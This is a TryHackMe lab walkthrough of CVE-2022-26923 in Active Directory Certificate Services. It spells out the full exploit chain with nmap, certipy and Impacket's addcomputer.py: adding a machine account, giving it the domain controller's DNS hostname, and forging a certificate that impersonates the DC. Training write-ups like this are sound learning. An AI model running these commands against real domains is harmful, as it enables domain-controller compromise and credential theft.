CVE-2022-26923 | TryHackMe

Hello!

Today we'll be covering up CVE-2022-26923.

CVSS v3
Base score: 8.8
Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Severity: High

Welcome to CVE-2022-26923 TryHackMe walkthrough. Today I decided to learn about Active Directory Certificate Service and I consider that this walkthorugh was a great occasion. I discovered certipy and practiced on nmap and Impacket's
addcomputer.py.

🔗 Link to the walkthorugh: https://tryhackme.com/r/room/cve202226923

🟡 Difficulty: Easy

⚙️ Tools:

• nmap,

• Impacket (addcomputer.py),

• certipy

💭 Note: $Target_IP= machine IP
Certain screenshots were intentionally omitted. I really encourage you to drop a comment shall you need support or just to say print("Hello world"). 😄

On my GitHub you'll find more info about Microsoft ADCS.

---

🪜 Steps I followed (after deploying the machine:

Add the DNS name and the machine IP in /etc/hosts

Run an nmap scan
nmap -A -Pn $Target_IP

Ports 88 and 389 are open.

-88 is used for Kerberos authentication system

-389 is for making LDAP connections so users can access protected network resources. Connections made through this port are unencrypted.

Get the Enterprise CA name
certipy find -u thm@lunar.eruca.com -p Password1@ -dc-ip $Target_IP

Test certificate generation

certipy req -username thm@lunar.eruca.com -password Password1@ -ca LUNAR-LUNDC-CA -target $Target_IP

Verify that this certificate is valid and can be used for Kerberos authentication

certipy auth -pfx thm.pfx

Add a Computer to the Domain

python3 addcomputer.py 'lunar.eruca.com/thm:Password1@' -method LDAPS -computer-name 'THMPC' -computer-pass 'Password1@' -dc-ip $Target_IP

Generate a certificate for the newly created computer

certipy req -username THMPC$ -password Password1@ -ca LUNAR-LUNDC-CA -target $Target_IP -template Machine

Verify that the certificate is valid

certipy auth -pfx thmpc.pfx

SSH into the machine

ssh lunar.eruca.com\\thm@lundc

Start Powershell

powershell

Get the current attributes from our Computer AD Object

Get-ADComputer THMPC -properties dnshostname,serviceprincipalname

Update the DNS hostname attribute to that of the DC

Set-ADComputer THMPC -ServicePrincipalName @{}

Set the DNS hostname attribute to that of the DC

Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.com

Verify that the changes were made

Get-ADComputer THMPC -properties dnshostname,serviceprincipalname

Forge a malicious certificate:

• Request a new certificate

certipy req -username THMPC$ -password Password1@ -ca LUNAR-LUNDC-CA -target lundc.lunar.eruca.com -template Machine

• Verify the certificate

certipy auth -pfx lundc.pfx

And we have the flag!